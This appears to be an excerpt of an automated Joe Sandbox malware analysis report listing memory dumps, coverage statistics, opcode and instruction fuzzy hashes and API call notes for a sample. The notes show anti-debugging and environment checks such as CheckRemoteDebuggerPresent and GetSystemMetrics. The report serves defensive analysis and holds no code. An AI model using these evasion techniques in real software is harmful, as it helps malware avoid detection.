                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd

                                                                                            Execution Graph

                                                                                            Execution Coverage:15.3%
                                                                                            Dynamic/Decrypted Code Coverage:24.5%
                                                                                            Signature Coverage:2.7%
                                                                                            Total number of Nodes:110
                                                                                            Total number of Limit Nodes:13

                                                                                            Control-flow Graph
                                                                                            [Control-flow graph, first node at 7ffb4b297d00; calls CheckRemoteDebuggerPresent]
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1674603735.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffb4b280000_d3yngi1q.jbxd
                                                                                            Similarity
                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                            • String ID:
                                                                                            • API String ID: 3662101638-0

                                                                                            Control-flow Graph
                                                                                            [Control-flow graph, first node at 7ffb4b2928c8; calls GetSystemMetrics]
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem
                                                                                            • String ID:
                                                                                            • API String ID: 4116985748-0

                                                                                            Control-flow Graph
                                                                                            [Control-flow graph, first node at 7ffb4b292928; calls GetSystemMetrics]
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem
                                                                                            • String ID:
                                                                                            • API String ID: 4116985748-0
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: FullImageNameProcessQuery
                                                                                            • String ID:
                                                                                            • API String ID: 3578328331-0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: [$]
                                                                                            • API String ID: 0-2073744556
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H#5K
                                                                                            • API String ID: 0-114298329
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 21a7959b6d50e13113fe4107c15acabe4a4b3c39b4e84a7f7cdb18230bb51941
                                                                                            • Instruction ID: f5891ae1e07728233a9e18c4b1942a1bfb04bf2b5a47ee4244b97290e6bacb19
                                                                                            • Opcode Fuzzy Hash: 21a7959b6d50e13113fe4107c15acabe4a4b3c39b4e84a7f7cdb18230bb51941
                                                                                            • Instruction Fuzzy Hash: CA81F8D2C1DEC24BE31ABF7CD9A11B97FB1EF52314B1880BED698861E7DD1868158381
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1ace1f8340743d5d5934620ac35fdae17bc891d2144d6632fc4717f23c69afb9
                                                                                            • Instruction ID: 79097e09a2f7f489b2b870f81d65c212de02b22adcb79f5cfff5a8614e6964d7
                                                                                            • Opcode Fuzzy Hash: 1ace1f8340743d5d5934620ac35fdae17bc891d2144d6632fc4717f23c69afb9
                                                                                            • Instruction Fuzzy Hash: 8C71207191894E8FDB85FF68C495AEAB7F1FF58300F1446A9D409D7296CE34A882CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f96150bda4dba9d9168a08ab521993228548082e0dfb8ee226b896b01a91d09f
                                                                                            • Instruction ID: 2aa2a4b46d9ecfe341397fefdc2d3fbb82dbeb427981c53c627efa9d47eb1626
                                                                                            • Opcode Fuzzy Hash: f96150bda4dba9d9168a08ab521993228548082e0dfb8ee226b896b01a91d09f
                                                                                            • Instruction Fuzzy Hash: 6C519EB190CA4E8FEB96FF78C8546AEBBA1FF55700F0445ADD409D71A2DE34A841C740
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 466dd12aa6ce618d676cfff11a5ab4381580aa2a1f50babece10aa3be6fe68f4
                                                                                            • Instruction ID: cec388718621b96d45e89b48cb8e9b252feea4259e87b9c43aafd005028616a5
                                                                                            • Opcode Fuzzy Hash: 466dd12aa6ce618d676cfff11a5ab4381580aa2a1f50babece10aa3be6fe68f4
                                                                                            • Instruction Fuzzy Hash: 3171E570D0992D8FDBA5EF58C895BE9BBF1FB58301F5001AAD40DE7291CB35AA84CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1f9fef11f018020449d3ebf67800d5ee15f2c6d77cd5224cdb9e9e64b868910
                                                                                            • Instruction ID: 898941dd8cf97dca57fe7978040e9d57c99a5be3f52c18074449c619be977373
                                                                                            • Opcode Fuzzy Hash: e1f9fef11f018020449d3ebf67800d5ee15f2c6d77cd5224cdb9e9e64b868910
                                                                                            • Instruction Fuzzy Hash: 1151ADB1D1C6498FEB96FF68C5957A9BFB1FF59300F4081BAC10993292CE386985CB41
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e2a0358b9d1c14f55514e000d3013733f2130df6e9e0cf98ca2dd91299d78a5d
                                                                                            • Instruction ID: e597adb5fe13f05407af503440cddbb0d90dc9771ae58c4d178e16d7bb838f33
                                                                                            • Opcode Fuzzy Hash: e2a0358b9d1c14f55514e000d3013733f2130df6e9e0cf98ca2dd91299d78a5d
                                                                                            • Instruction Fuzzy Hash: CA51C8B1D1995D8FDB99EF68C4A5BA8BBA1FF58301F5440BDD00EE7296CE346881CB01
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 893c4a611caa97f56dfa2f74f6c815f16933ada058d42d6a451fa411e3d6141e
                                                                                            • Instruction ID: bd3a870904e33f131495d851b2392e8e5da1fce720f350b286c9329e2cdf9ec8
                                                                                            • Opcode Fuzzy Hash: 893c4a611caa97f56dfa2f74f6c815f16933ada058d42d6a451fa411e3d6141e
                                                                                            • Instruction Fuzzy Hash: 4F51B2B0D18A1D8FDB94EFA8C895BEDBBB1FF58301F10016AD509E7291DA746881CB41
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0b420466c0fb1f5e44d8772a3bf6b6e0240b5a63360f43d93f18ea681114a1fe
                                                                                            • Instruction ID: 01c93d6138ccda6e0b8b8a84a06943ddc9c3c9b5fc61e68dec84bf7f5a42ab3f
                                                                                            • Opcode Fuzzy Hash: 0b420466c0fb1f5e44d8772a3bf6b6e0240b5a63360f43d93f18ea681114a1fe
                                                                                            • Instruction Fuzzy Hash: 3451C8B0D18A5D8FDF99EFA8C8546EEBBB2FF58301F14412AD509E7295CB349845CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c3fd79b10b0376a32d18a2cadb150335f9610fc4d006192ac9cfe92dfc5f2ce4
                                                                                            • Instruction ID: c872fb0a7144e3aa8aad7ca142752afa5a9524e78c94e201980a3e8305e123e4
                                                                                            • Opcode Fuzzy Hash: c3fd79b10b0376a32d18a2cadb150335f9610fc4d006192ac9cfe92dfc5f2ce4
                                                                                            • Instruction Fuzzy Hash: 2D419BB1E1CA1D8FDB45EFA8D845AEEBBF1FF58300F10417AE409E7295DA34A9018B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f5347f2a4bbd288339d01f4b8b68edc1be01aa9784d0a34b362b3c8fd3b9ba78
                                                                                            • Instruction ID: d67c5c40881accde79b705704637d8b1d827b385ed1eeca80b4f32f046085dcc
                                                                                            • Opcode Fuzzy Hash: f5347f2a4bbd288339d01f4b8b68edc1be01aa9784d0a34b362b3c8fd3b9ba78
                                                                                            • Instruction Fuzzy Hash: 995169B1C0D68A8FEB56AF64C9542FEBFB0FF06300F0545AED544E6192DA285A48CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1e0830ae0c91c1d4ef32b5759c809f92a4a8f25de841490b95889f2d095366f2
                                                                                            • Instruction ID: 16ed1a18faf4a67c36972898296b77d3c126d134e05514304b9ed79d00239743
                                                                                            • Opcode Fuzzy Hash: 1e0830ae0c91c1d4ef32b5759c809f92a4a8f25de841490b95889f2d095366f2
                                                                                            • Instruction Fuzzy Hash: 4A4105B180D61D8EDB92EFB4D4486EEBBB0FF19300F50057AD409E3192DB78A985CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5527c83664f12b72471e1944518c21774fa1e581a6511dbe7a602a8a412e6248
                                                                                            • Instruction ID: 0ab5d227d7f08b1686cf6d54fd7071a403abcdd8ad340626fc7aacc51cdc3172
                                                                                            • Opcode Fuzzy Hash: 5527c83664f12b72471e1944518c21774fa1e581a6511dbe7a602a8a412e6248
                                                                                            • Instruction Fuzzy Hash: 8A41F674A1C91D8FDF98EF68C895BACB7F1FB58305F5480AD904EE3255CE74A8818B40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 11eeaec1591b149b232ac78d780f4c688844d443a9e6d86ebcc85dfab78f4e00
                                                                                            • Instruction ID: e42f2960a28578f8c9ca70d6b6ced9546aee39741f84d0ef7ea462a45a17b964
                                                                                            • Opcode Fuzzy Hash: 11eeaec1591b149b232ac78d780f4c688844d443a9e6d86ebcc85dfab78f4e00
                                                                                            • Instruction Fuzzy Hash: 3431CA7091891D8FDF99EF68C855BEEBBB2FB98305F10412ED509E3295CB349845CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9527265fe19ae0fda73678af638c2deb3c41df280511e426a30ad4010593dc71
                                                                                            • Instruction ID: 34ae8d040557c4a9774bf30e2cca040a2d242bb813bf41db951e6cee1259b755
                                                                                            • Opcode Fuzzy Hash: 9527265fe19ae0fda73678af638c2deb3c41df280511e426a30ad4010593dc71
                                                                                            • Instruction Fuzzy Hash: 20416BB0D0D6598FEB45EFB8C8996E9BBB1FF45301F4041BAD009D72A2CA389881CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6be3521351250d3f6f821ab4fbc5e85842a09324849fbeafb981298070d60cdb
                                                                                            • Instruction ID: d3fc40fd57e8e170bd660f41fbdd92446a680d4ae3fc10d869b3775916fbc8db
                                                                                            • Opcode Fuzzy Hash: 6be3521351250d3f6f821ab4fbc5e85842a09324849fbeafb981298070d60cdb
                                                                                            • Instruction Fuzzy Hash: 013115A181DACA4FE752EF3CC8656E93FA0FF56314F4581BAED88861A3CF245845C381
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb18ea2b4b3faeaf871713bb95e31a5c5e5a7f0f9a8679695613519f9de55f51
                                                                                            • Instruction ID: a979d542f05a3f3ba63358ae290af9557d85f891f8532dc7eab6012ce3f523b2
                                                                                            • Opcode Fuzzy Hash: fb18ea2b4b3faeaf871713bb95e31a5c5e5a7f0f9a8679695613519f9de55f51
                                                                                            • Instruction Fuzzy Hash: D1217A7191CA5D8FDB81EF68D855AEDBBF1FF59311F04016AE408E32A2CA24A8518B90
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_30_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b02e942abef0dd3dac6a3baaedfb4afc2528695e05b44f9133028777ccf918ab
                                                                                            • Instruction ID: 85acf573275d38f1fae65c926555df358e7d8d094002cb9c448600fda9c73a55
                                                                                            • Opcode Fuzzy Hash: b02e942abef0dd3dac6a3baaedfb4afc2528695e05b44f9133028777ccf918ab
                                                                                            • Instruction Fuzzy Hash: 38312B70D0D61A8BEBA9EE24C5593B9B6A1EF54300F1045BDD95DD32A2CE38A981CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2153554595.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Strings
                                                                                            • String ID: 0O5K$@O5K$PO5K$`O5K$pP5K
                                                                                            • API String ID: 0-3199577557
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$H$[$[$\$]$]$u${${$}$}
                                                                                            • API String ID: 0-2063274034
                                                                                            Strings
                                                                                            • String ID: H#4K
                                                                                            • API String ID: 0-533413016
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67039cbe3d537aa58839cd969439182095a01e015de03285bc4be98d5dd931d7
                                                                                            • Instruction ID: 220b0bf1263385306bd4a59348e6afebfdfd38392b340fd04564fc763d038337
                                                                                            • Opcode Fuzzy Hash: 67039cbe3d537aa58839cd969439182095a01e015de03285bc4be98d5dd931d7
                                                                                            • Instruction Fuzzy Hash: 2B712F7191894E8FDB45FF68C495AEABBF1FF58300F1445B5D409D7296CE38A882CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 274fcaf349138418a54b9f200bc210fa9ac8e3a276ff26888184e6e329350d19
                                                                                            • Instruction ID: 54ad38b0562ac40cf8b22df9ffe221aaaaf89fce7dbc722a80a09d43b647446a
                                                                                            • Opcode Fuzzy Hash: 274fcaf349138418a54b9f200bc210fa9ac8e3a276ff26888184e6e329350d19
                                                                                            • Instruction Fuzzy Hash: 9B61AFB190CA4E8FEB94FF78C8946EABBE1FF59301F4441BAD409D71A2CA34A841C740
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dc86f581ba0771d961723eda85e24693b65ed5f51efe457417aa8e32934185b5
                                                                                            • Instruction ID: 899f053ef99d18a2eebcc3883bf5d60f5d58363545dbbe474b4c7385ed68019d
                                                                                            • Opcode Fuzzy Hash: dc86f581ba0771d961723eda85e24693b65ed5f51efe457417aa8e32934185b5
                                                                                            • Instruction Fuzzy Hash: 857115D2C1DEC64BE356BF7CD9260B97FA0AF59314B1880BBE59C864E7DD18E8058381
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1f67958fda1100bd4a5b64bf387002a583cbb9112b1141ef31379039dca97512
                                                                                            • Instruction ID: 183c84190b5c68d237f0f9271ea8616cc422d74f462d635dd1143da83c9c7854
                                                                                            • Opcode Fuzzy Hash: 1f67958fda1100bd4a5b64bf387002a583cbb9112b1141ef31379039dca97512
                                                                                            • Instruction Fuzzy Hash: 1971D570D0992D8FDBA5EF58C894BE9BBF1FB58301F5001AAD40DE7291DB35AA84CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0cfb7a8e7611ec59cbd4c5fc1cc9a0278ff1315442ff00911ef48bf87bf6f315
                                                                                            • Instruction ID: 27fec2be69381293a8c4200ca3b499a58037ed48a8202963e0c58a049713430e
                                                                                            • Opcode Fuzzy Hash: 0cfb7a8e7611ec59cbd4c5fc1cc9a0278ff1315442ff00911ef48bf87bf6f315
                                                                                            • Instruction Fuzzy Hash: AE618EB1D0CA598FDB96FF68C5557A8BFB1FF59300F4081BAC10993292CB38A945CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c13e43e4d090fd67144dd0f5191c7977675938b979a5ceaea4c364f55f4f12b7
                                                                                            • Instruction ID: bef4db7d2402145abb0f3c7145f10cb24d35c019c99d51afd4430a89fe845d6b
                                                                                            • Opcode Fuzzy Hash: c13e43e4d090fd67144dd0f5191c7977675938b979a5ceaea4c364f55f4f12b7
                                                                                            • Instruction Fuzzy Hash: 9B51B4B0E18A1D8FDB94EFA8C855BEDBBB1FF58701F10016AD409E7691CB74A881CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70dfb590b351ea82a6a1854daaa4f35f7cdcc9c63d037630c9aae6e5d2044ec7
                                                                                            • Instruction ID: c62cf88da4c323bbdf3cfe9a44ae960f6e4fe09460d94aceaa899c4c97f84aa0
                                                                                            • Opcode Fuzzy Hash: 70dfb590b351ea82a6a1854daaa4f35f7cdcc9c63d037630c9aae6e5d2044ec7
                                                                                            • Instruction Fuzzy Hash: 2251FBB0D18A5D8FDF94EFA8C9546EDBBB2FF58301F14412AD409E7295CB345845CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bdc8846ff414e79e6427d84ec1192748fb1ff4a666bc746d8439f52a1e44951b
                                                                                            • Instruction ID: 50b47fa42c4e139bd2d13e19031e409020eebbbd42e1921b3d768b8f72089423
                                                                                            • Opcode Fuzzy Hash: bdc8846ff414e79e6427d84ec1192748fb1ff4a666bc746d8439f52a1e44951b
                                                                                            • Instruction Fuzzy Hash: ED419AB0E1891D8FDB45EFA8D845AFEBBB1FF58300F1041BAE409E7295DA34A9018B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2ff20be992b8a9cb14515b8ab74833bc33feaab9b9e9fa34fe7cd77cdcffc441
                                                                                            • Instruction ID: 1fb9ba38d4af0f6fdc47a8c07acba01b3a2bf5b3844011997466a509253ec008
                                                                                            • Opcode Fuzzy Hash: 2ff20be992b8a9cb14515b8ab74833bc33feaab9b9e9fa34fe7cd77cdcffc441
                                                                                            • Instruction Fuzzy Hash: 4551697180D28A8FDB56EF74C8A52FEBBB0EF1A300F0545BAD505E7192DB385A48CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4cb813753cbb6cc7007f8055112e41ca4b55aca7a84d658db234effaa2564692
                                                                                            • Instruction ID: aa08a3996310c18656c08171f66c874b412dbf1a9ed7af11e6e0439779f790cf
                                                                                            • Opcode Fuzzy Hash: 4cb813753cbb6cc7007f8055112e41ca4b55aca7a84d658db234effaa2564692
                                                                                            • Instruction Fuzzy Hash: 1A4127B1C09A1D8FDB55EFB4D4486EEBBB1FF19300F50057AE409E3192DA78A945CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6733d296242cf56c1ee9ea70c5c52d2c4ff8980d09ab146ea6bc6d55efa482d5
                                                                                            • Instruction ID: 4c421fe0df8d6ea25e6bf716aec7ad76b5ec9c5437eb9d75024a5ac02cc54d90
                                                                                            • Opcode Fuzzy Hash: 6733d296242cf56c1ee9ea70c5c52d2c4ff8980d09ab146ea6bc6d55efa482d5
                                                                                            • Instruction Fuzzy Hash: 4441F974A1891D8FDFA8EF68D895BACB7F1FB58705F5480A9D04EE3251CE74AC818B40
